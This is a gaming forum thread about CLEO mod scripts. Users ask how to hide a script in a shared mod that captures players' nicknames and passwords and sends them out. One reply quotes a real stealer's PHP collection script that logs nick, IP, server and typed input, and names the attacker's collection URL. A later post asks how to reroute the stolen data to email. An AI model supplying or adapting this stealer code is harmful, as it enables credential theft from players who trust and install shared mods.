CLEO Help Script Help

CLEO related
Status
Not open for further replies.

daki

Active member
Joined
Oct 11, 2019
Messages
38
Reaction score
5
Location
Serbia
Hi,can a small script be inserted into the script that takes pw and nick from the people who use that script and send it to email or alread?
 

Fr0z3n

Well-known member
Joined
Nov 20, 2019
Messages
294
Reaction score
36
Location
Srbija
Hi,can a small script be inserted into the script that takes pw and nick from the people who use that script and send it to email or alread?

jeah i think there is a way but idk, some good scirpters should know that, i think its not so hard
 

Zin

Expert
Joined
Aug 1, 2013
Messages
1,690
Reaction score
103
Probably all forums speak against this sort of thing, it’s a dick move and by encouraging it there will be even more stealers everywhere.
 

monday

Expert
Joined
Jun 23, 2014
Messages
1,125
Reaction score
149
to the website set up by the attacker:
http://rvankarus.esy.es/cleo/add.php

which opens "Readme.HTML" and appends new line with collected data using PHP, that's the code responsible for that (which he included in the comments of that cleo):
<?php
$f = fopen("Readme.HTML", "a");
$s = "<u>Login:</u><strong> " . $_GET['nick'] . " |...|</strong> " . " <u>Ip:</u> " . $_GET['ip'] . " <strong>|...|</strong> " . " <u>Server:</u><em> " . $_GET['serv'] . " </em><strong>|...|</strong> " . " <u>Dialog:</u> " . $_GET['dialog'] . " <strong>|...|</strong> " . " <u>Text:</u><strong> " . $_GET['input'] . " |...|</strong> " . " <u>Money:</u> " . $_GET['mn'] . "<br />";
fwrite($f, $s);
fclose($f);
?>

btw that "Readme.HTML" was accessible for anyone who knew the link by looking in the code, so anyone could see the collected data, that's probably not the way you'd want to set it up
 

Fr0z3n

Well-known member
Joined
Nov 20, 2019
Messages
294
Reaction score
36
Location
Srbija
to the website set up by the attacker:
http://rvankarus.esy.es/cleo/add.php

which opens "Readme.HTML" and appends new line with collected data using PHP, that's the code responsible for that (which he included in the comments of that cleo):


btw that "Readme.HTML" was accessible for anyone who knew the link by looking in the code, so anyone could see the collected data, that's probably not the way you'd want to set it up

Do you have explain how i change to send me to email?
 

Fr0z3n

Well-known member
Joined
Nov 20, 2019
Messages
294
Reaction score
36
Location
Srbija
i have a better idea, let's post here passwords of players whos got cheated and tricked into using stealer

You dont know why me or someone need stealer...so stfu i dont need it to steal fucking accounts i need that for something else.....
 
Status
Not open for further replies.
Top